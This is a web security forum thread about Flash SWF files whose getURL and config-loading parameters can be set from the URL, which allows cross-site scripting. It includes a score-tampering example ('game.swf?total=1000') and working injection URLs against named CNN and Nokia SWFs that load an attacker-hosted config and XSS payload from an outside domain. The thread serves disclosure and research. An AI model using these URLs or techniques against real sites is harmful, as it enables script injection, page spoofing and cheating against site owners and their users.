Hi everyone,
Just new to the forum (so maybe I'm tellin old news).

During the last couple of days I've been doing some web app testing against a series of websites using quite some .swf objects. I started to decompile a bunch of these flash files and found out that quite a few of them simply call the getUrl method, using parameters provided via the HTML page.

In no time, I even found examples that include a simple check to verify if the parameter is defined externally or not (in the latter case, i takes a default value). In this case the vektor is almost invisible, unless decompiled.

It is no secret that the getUrl can execute javascript:...., but it is apparently very easy to inject this directly via the address bar by calling the swf drectly with a parameter. (I tried some encoding techniques and they worked fine to.)

Does anyone has some references or more info on the subject?

Looking for an example? The flash on www.Astalavista.net is a perfect example. Download it locally and decompile the swf file using flare. It is very easy to spot the paramters and how to call them via the address bar. I copied the flash on a local webserver and got very good results in injecting scripting.

Feedback is most welcome.

Yep, there's some really good work on that subject by Stefano Di Paolo, fukami & others, here are some links which may interest you:

http://www.wisec.it/sectou.php?id=464dd35c8c5ad
https://www.flashsec.org/mediawiki/images/8/8a/CCCampFlashSec.pdf
https://www.flashsec.org/wiki/Articles

And the FlashSec wiki is pretty good in general as well.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

This flaw has been around for ages but I'm surprised why it hasn't been exploited more often. Especially when you consider that global variables can be injected into Flash for things like online games, were you can win prizes for the top scores ;) Of course you can call the scoreboard code directly but some Flash games encode things.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> Especially when you consider that global variables
> can be injected into Flash for things like online
> games, were you can win prizes for the top scores
> ;) Of course you can call the scoreboard code
> directly but some Flash games encode things.

According to FlashSec (i.e. fukami), this behaviour has been removed in AS3: https://www.flashsec.org/wiki/Overwriting_Global_Variables

And even if Flash encodes things, you can always just recompile your own version, so the variable injection issue is really pretty irrelevant to Flash games.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Yeah I know that but why bother to download and recompile when sometimes you can just do:-

game.swf?total=1000

I thought it was cool anyway

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

What I find even more funny is to overwrite config data used with XML.data(). So it possible to use a foreign movie with your own content =)

Some Examles:
* CNN "v0t3 t3h l33t": http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/config.xml
* CNN XSS: http://www.cnn.com/ELECTION/2008/debates/scorecard/DebateScoreCard.swf?CNN_configUrl=http://cnn.website-security.org/xss.xml
* Original site: http://www.cnn.com/ELECTION/2008/debates/scorecard/

* Nokia offers OpenMoko: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/config.xml
* Nokia XSS: http://www.nokia.com/EUROPE_NOKIA_COM_3/Get_Support/Software/Mac_Support/flash/download.swf?optionsfile=http://nokia.website-security.org/xss.xml
* Original site (gone?!): http://www.nokia.com/A4299040p

@fukami

Hehe excellent!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]